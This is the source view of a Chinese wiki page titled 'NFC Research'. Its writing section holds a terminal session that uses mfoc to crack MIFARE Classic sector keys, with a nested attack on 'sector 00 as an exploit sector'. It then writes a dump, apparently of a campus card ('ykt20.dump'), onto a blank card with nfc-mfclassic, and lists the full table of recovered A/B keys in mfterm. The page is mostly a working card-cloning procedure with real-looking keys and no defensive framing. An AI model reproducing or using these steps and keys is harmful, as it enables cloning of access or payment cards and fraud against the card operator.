查看NFC Research的源代码
←
NFC Research
跳转到:
导航
,
搜索
因为以下原因,你没有权限编辑本页:
您刚才请求的操作只有这个用户组中的用户才能使用:
用户
您可以查看并复制此页面的源代码:
== 写入 == <source lang=bash> $ sudo mfoc -P 500 -O blank.card.orig.dump ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 * UID size: single * bit frame anticollision supported UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1 * SmartMX with MIFARE 1K emulation Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx] [Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx] [Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx] ...... ...... Sector 00 - FOUND_KEY [A] Sector 00 - FOUND_KEY [B] Sector 01 - FOUND_KEY [A] Sector 01 - FOUND_KEY [B] Sector 02 - FOUND_KEY [A] Sector 02 - FOUND_KEY [B] ...... ...... We have all sectors encrypted with the default keys.. Auth with all sectors succeeded, dumping keys to a file! Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...... ...... # nfc-mfclassic W a ykt20.dump blank.card.orig.dump f NFC reader: ACS / ACR122U PICC Interface opened Found MIFARE Classic card: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 Guessing size: seems to be a 1024-byte card Sent bits: 50 00 57 cd Sent bits: 40 (7 bits) unlock failure! # nfc-mfclassic w a ykt20.dump blank.card.orig.dump NFC reader: ACS / ACR122U PICC Interface opened Found MIFARE Classic card: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 Guessing size: seems to be a 1024-byte card Writing 64 blocks |...............................................................| Done, 63 of 64 blocks written. # mfoc -P 500 -O dump.card.file ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 * UID size: single * bit frame anticollision supported UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1 * SmartMX with MIFARE 1K emulation Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: ffffffffffff] -> [................] [Key: a0a1a2a3a4a5] -> [/...............] [Key: d3f7d3f7d3f7] -> [/...............] [Key: 000000000000] -> [/...............] ...... ...... Sector 00 - FOUND_KEY [A] Sector 00 - UNKNOWN_KEY [B] Sector 01 - UNKNOWN_KEY [A] Sector 01 - UNKNOWN_KEY [B] Sector 02 - UNKNOWN_KEY [A] Sector 02 - UNKNOWN_KEY [B] ...... ...... Using sector 00 as an exploit sector Sector: 1, type A, probe 0, distance 32 ..... Sector: 1, type A, probe 1, distance 32 ..... Found Key: A [2c5a3710d3a5] Sector: 2, type A, probe 0, distance 32 ..... Sector: 2, type A, probe 1, distance 32 ..... Found Key: A [c1f4ff83b109] Sector: 3, type A, probe 0, distance 32 ..... Sector: 3, type A, probe 1, distance 32 ..... Found Key: A [3c34515b11d4] Sector: 4, type A, probe 0, distance 32 ..... Found Key: A [0725a08f31e6] Sector: 5, type A, probe 0, distance 32 ..... Found Key: A [5601f83644bb] ...... ...... Auth with all sectors succeeded, dumping keys to a file! Block 63, type A, key aec383ce3c12 :00 00 00 00 00 00 7f 07 88 00 00 00 00 00 00 00 Block 62, type A, key aec383ce3c12 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 61, type A, key aec383ce3c12 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...... ...... # mfterm $ keys load dump.card.file Successfully loaded keys from: dump.card.file $ keys xS xB KeyA KeyB ---------------------------------- 00 03 a0a1a2a3a4a5 f1475c9ee325 01 07 2c5a3710d3a5 840b2a0d47f1 02 0b c1f4ff83b109 dc0fa2d4d8aa 03 0f 3c34515b11d4 b42fa69d3acf 04 13 0725a08f31e6 f8cf2c85e843 05 17 5601f83644bb c9398274ca1d 06 1b 20f2bf55ac1a 8f5ad31b4f53 07 1f dd77fb8c3736 e95fc402e7b6 08 23 c2180972c580 d43ea542967d 09 27 742c582e8c04 d43ea542967d 0a 2b db338f92bb98 e92d77b9a1f2 0b 2f 15559907e873 4f94956dfae7 0c 33 c8313c454d2a 25860937af4d 0d 37 c896c22e5b3e 717b5b4b67d2 0e 3b 72558e3fe66c aded278592c2 0f 3f aec383ce3c12 f1475c9ee325 $ keys load ykt20.dump Successfully loaded keys from: ykt20.dump $ keys xS xB KeyA KeyB ---------------------------------- 00 03 a0a1a2a3a4a5 f1475c9ee325 01 07 2c5a3710d3a5 840b2a0d47f1 02 0b c1f4ff83b109 dc0fa2d4d8aa 03 0f 3c34515b11d4 b42fa69d3acf 04 13 0725a08f31e6 f8cf2c85e843 05 17 5601f83644bb c9398274ca1d 06 1b 20f2bf55ac1a 8f5ad31b4f53 07 1f dd77fb8c3736 e95fc402e7b6 08 23 c2180972c580 d43ea542967d 09 27 742c582e8c04 d43ea542967d 0a 2b db338f92bb98 e92d77b9a1f2 0b 2f 15559907e873 4f94956dfae7 0c 33 c8313c454d2a 25860937af4d 0d 37 c896c22e5b3e 717b5b4b67d2 0e 3b 72558e3fe66c aded278592c2 0f 3f aec383ce3c12 f1475c9ee325 $ read No key argument (A|B) given. Defaulting to A Reading: [................] Success! Read MIFARE Classic 1k (SAK: 08, ATQA: 00 04) </source> <br><br>
返回到
NFC Research
。
个人工具
登录
名字空间
页面
讨论
变换
查看
阅读
查看源代码
查看历史
操作
搜索
导航
首页
社区专页
新闻动态
最近更改
随机页面
帮助
工具箱
链入页面
相关更改
特殊页面